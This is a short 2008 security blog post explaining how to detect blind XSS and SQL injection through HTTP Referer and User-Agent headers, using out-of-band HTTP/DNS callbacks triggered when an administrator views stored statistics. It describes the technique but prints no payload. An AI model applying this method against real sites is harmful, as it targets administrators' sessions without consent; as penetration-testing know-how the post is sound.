Out-of-Band attacks are widely known and have been using for exploiting SQL Injection vulnerabilities. The main point is making a HTTP/DNS/etc request with containing sensitive data to the server that has been controlling by the attacker via the vulnerable channel.

Basic Info

When we need OoB Channels to check XSS?

For SQL Injection attacks, they can be very useful for totally-blind SQL Injections. Because there isn’t any error message or any kind of difference at output.

Also If we don’t have permission to see the XSS vulnerable script, it can be classified as blind XSS vulnerability.

Many of blog / portal softwares stores some portions of HTTP header such as HTTP_REFERER ,USER_AGENT and HTTP_X_FORWARDED_FOR for informational purposes.Also they show these information from their administrative panels.

The Problem

From an attacker’s perspective, there is a big problem if no input sanitization were made because these sections of HTTP header can be manipulated and also can be used for attack purposes such as:

1) SQL Injection :This can occur at storing these data to the database server.

2) XSS : This can occur when administrator looks for Referers or User-Agent statistics.

In this situtation, SQL Injection may be realized but XSS can’t be tested because, only administrator can see the working of attack. So, basic XSS testing method- “<script>alert(1)</script>” - can not be used to test this kind of XSS vulnerabilities.

This attack will be very critical because XSS attack will be performed against the administrator.

Exploiting Phase

To perform the attack, you must fill the HTTP_REFERER and USER-AGENT with the attack payload and wait for HTTP/DNS/etc requests.

Sure that advanced payloads can be developed with many filter bypassing abilities and etc.The one thing must be done is to wait for administrators to check his site’s referrers or user-agents.

Thanks & Credits

Thanks Bedirhan Urgun for DNS-channel javascript payload.

Add a comment

Posted by Mesut TİMUR on 24 Mart 2008 Pazartesi 04:15:41 EET#